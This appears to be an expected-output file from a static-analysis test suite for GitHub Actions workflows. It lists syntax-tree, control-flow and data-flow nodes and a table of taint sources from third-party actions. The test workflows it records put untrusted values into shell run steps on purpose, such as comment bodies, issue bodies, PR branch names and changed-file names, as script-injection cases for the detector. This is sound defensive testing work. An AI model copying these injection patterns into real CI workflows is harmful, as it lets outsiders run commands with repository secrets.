.github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | +| 
.github/workflows/multiline.yml:3:17:3:22 | Prev | .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:5:9:5:17 | completed | .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:9:5:33:14 | Job: Test | .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:9:14:9:26 | ubuntu-latest | .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:9:14:9:26 | ubuntu-latest | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:11:9:15:6 | Run Step | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:11:9:15:6 | Run Step | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | 
.github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:15:9:20:6 | Run Step | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:20:9:24:6 | Run Step | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:24:9:30:6 | Run Step | +| .github/workflows/multiline.yml:30:9:33:14 | Run Step | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > 
event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:30:9:33:14 | Run Step | +| .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:5:14:5:26 | ubuntu-latest | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:5:14:5:26 | ubuntu-latest | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:8:7:10:4 | Job outputs node | +| .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | .github/workflows/test.yml:8:7:10:4 | Job outputs node | +| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | .github/workflows/test.yml:1:1:40:53 | on: push | +| 
.github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:13:24:13:24 | 0 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:13:24:13:24 | 0 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:13:24:13:24 | 0 | .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:15:15:15:31 | Get changed files | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:15:15:15:31 | Get changed files | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:15:15:15:31 | Get changed files | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:16:13:16:18 | source | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:16:13:16:18 | source | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:16:13:16:18 | source | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:17:15:17:42 | tj-actions/changed-files@v40 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:17:15:17:42 | tj-actions/changed-files@v40 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:17:15:17:42 | tj-actions/changed-files@v40 | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:19:15:19:43 | Remove foo from changed files | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:19:15:19:43 | Remove foo from changed files 
| .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:19:15:19:43 | Remove foo from changed files | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:20:13:20:16 | step | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:20:13:20:16 | step | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:20:13:20:16 | step | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:21:15:21:55 | mad9000/actions-find-and-replace-string@3 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:21:15:21:55 | mad9000/actions-find-and-replace-string@3 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:21:15:21:55 | mad9000/actions-find-and-replace-string@3 | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | +| .github/workflows/test.yml:24:17:24:21 | foo | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:24:17:24:21 | foo | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:24:17:24:21 | foo | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:25:20:25:21 | | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:25:20:25:21 | | 
.github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:25:20:25:21 | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| 
.github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:32:14:32:26 | ubuntu-latest | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:32:14:32:26 | ubuntu-latest | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | +| .github/workflows/test.yml:34:10:34:24 | always() | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | +| .github/workflows/test.yml:34:11:34:25 | always() | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | +| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:36:12:36:15 | job1 | +| .github/workflows/test.yml:39:9:40:53 
| Run Step: sink | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | +cfgNodes +| .github/workflows/expression_nodes.yml:1:1:21:47 | enter on: issue_comment | +| .github/workflows/expression_nodes.yml:1:1:21:47 | exit on: issue_comment | +| .github/workflows/expression_nodes.yml:1:1:21:47 | exit on: issue_comment (normal) | +| .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | +| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | +| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | +| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | +| 
.github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | +| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | +| .github/workflows/multiline.yml:1:1:33:14 | enter on: | +| .github/workflows/multiline.yml:1:1:33:14 | exit on: | +| .github/workflows/multiline.yml:1:1:33:14 | exit on: (normal) | +| .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:11:9:15:6 | Run Step | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | +| .github/workflows/multiline.yml:30:9:33:14 | Run Step | +| .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | +| .github/workflows/test.yml:1:1:40:53 | enter on: push | +| .github/workflows/test.yml:1:1:40:53 | exit on: push | +| .github/workflows/test.yml:1:1:40:53 | exit on: push (normal) | +| .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | +| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| 
.github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | +dfNodes +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | +| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | +| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | +| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | +| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | +| .github/workflows/multiline.yml:9:5:33:14 | 
Job: Test | +| .github/workflows/multiline.yml:11:9:15:6 | Run Step | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | +| .github/workflows/multiline.yml:30:9:33:14 | Run Step | +| .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | +| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | +argumentNodes +| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | +usesIds +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | step | +nodeLocations +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | .github/workflows/expression_nodes.yml:5:5:21:47 | .github/workflows/expression_nodes.yml@5:5:21:47 | +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:9:8:6 | .github/workflows/expression_nodes.yml@7:9:8:6 | +| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | 
.github/workflows/expression_nodes.yml:7:27:7:58 | .github/workflows/expression_nodes.yml@7:27:7:58 | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:8:9:10:6 | .github/workflows/expression_nodes.yml@8:9:10:6 | +| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:9:25:9:56 | .github/workflows/expression_nodes.yml@9:25:9:56 | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:10:9:13:6 | .github/workflows/expression_nodes.yml@10:9:13:6 | +| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:11:25:11:56 | .github/workflows/expression_nodes.yml@11:25:11:56 | +| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:12:24:12:51 | .github/workflows/expression_nodes.yml@12:24:12:51 | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:13:9:16:6 | .github/workflows/expression_nodes.yml@13:9:16:6 | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:14:9:15:46 | .github/workflows/expression_nodes.yml@14:9:15:46 | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:14:9:15:46 | .github/workflows/expression_nodes.yml@14:9:15:46 | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:16:9:20:6 | .github/workflows/expression_nodes.yml@16:9:20:6 | +| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:17:25:17:56 | .github/workflows/expression_nodes.yml@17:25:17:56 | +| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | 
.github/workflows/expression_nodes.yml:18:24:18:51 | .github/workflows/expression_nodes.yml@18:24:18:51 | +| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | .github/workflows/expression_nodes.yml:19:24:19:55 | .github/workflows/expression_nodes.yml@19:24:19:55 | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:9:21:47 | .github/workflows/expression_nodes.yml@20:9:21:47 | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | +| .github/workflows/multiline.yml:9:5:33:14 | Job: Test | .github/workflows/multiline.yml:9:5:33:14 | .github/workflows/multiline.yml@9:5:33:14 | +| .github/workflows/multiline.yml:11:9:15:6 | Run Step | .github/workflows/multiline.yml:11:9:15:6 | .github/workflows/multiline.yml@11:9:15:6 | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | .github/workflows/multiline.yml:15:9:20:6 | .github/workflows/multiline.yml@15:9:20:6 | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step | .github/workflows/multiline.yml:20:9:24:6 | .github/workflows/multiline.yml@20:9:24:6 | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | .github/workflows/multiline.yml:24:9:30:6 | .github/workflows/multiline.yml@24:9:30:6 | +| .github/workflows/multiline.yml:30:9:33:14 | Run Step | .github/workflows/multiline.yml:30:9:33:14 | .github/workflows/multiline.yml@30:9:33:14 | +| .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | .github/workflows/multiline.yml:32:13:32:39 | .github/workflows/multiline.yml@32:13:32:39 | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | .github/workflows/test.yml:5:5:31:2 | 
.github/workflows/test.yml@5:5:31:2 | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:8:7:10:4 | .github/workflows/test.yml@8:7:10:4 | +| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | .github/workflows/test.yml:8:20:8:50 | .github/workflows/test.yml@8:20:8:50 | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | .github/workflows/test.yml:11:9:15:6 | .github/workflows/test.yml@11:9:15:6 | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | .github/workflows/test.yml:15:9:19:6 | .github/workflows/test.yml@15:9:19:6 | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | .github/workflows/test.yml:19:9:26:6 | .github/workflows/test.yml@19:9:26:6 | +| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:23:20:23:64 | .github/workflows/test.yml@23:20:23:64 | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:9:28:6 | .github/workflows/test.yml@26:9:28:6 | +| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:27:20:27:64 | .github/workflows/test.yml@27:20:27:64 | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:9:31:2 | .github/workflows/test.yml@28:9:31:2 | +| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | .github/workflows/test.yml:29:15:29:55 | .github/workflows/test.yml@29:15:29:55 | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | .github/workflows/test.yml:32:5:40:53 | .github/workflows/test.yml@32:5:40:53 | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:39:9:40:53 | .github/workflows/test.yml@39:9:40:53 | +| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | .github/workflows/test.yml:40:20:40:53 | .github/workflows/test.yml@40:20:40:53 | +scopes +| 
.github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/test.yml:1:1:40:53 | on: push | +sources +| ahmadnassri/action-changed-files | * | output.files | PR changed files | manual | +| ahmadnassri/action-changed-files | * | output.json | PR changed files | manual | +| amannn/action-semantic-pull-request | * | output.error_message | PR title | manual | +| cypress-io/github-action | * | env.GH_BRANCH | PR branch | manual | +| dawidd6/action-download-artifact | * | output.artifacts | Artifact details | manual | +| dorny/paths-filter | * | output.changes | PR changed files | manual | +| franzdiebold/github-env-vars-action | * | output.CI_PR_DESCRIPTION | PR body | manual | +| franzdiebold/github-env-vars-action | * | output.CI_PR_TITLE | PR title | manual | +| jitterbit/get-changed-files | * | output.added | PR changed files | manual | +| jitterbit/get-changed-files | * | output.added_modified | PR changed files | manual | +| jitterbit/get-changed-files | * | output.all | PR changed files | manual | +| jitterbit/get-changed-files | * | output.deleted | PR changed files | manual | +| jitterbit/get-changed-files | * | output.modified | PR changed files | manual | +| 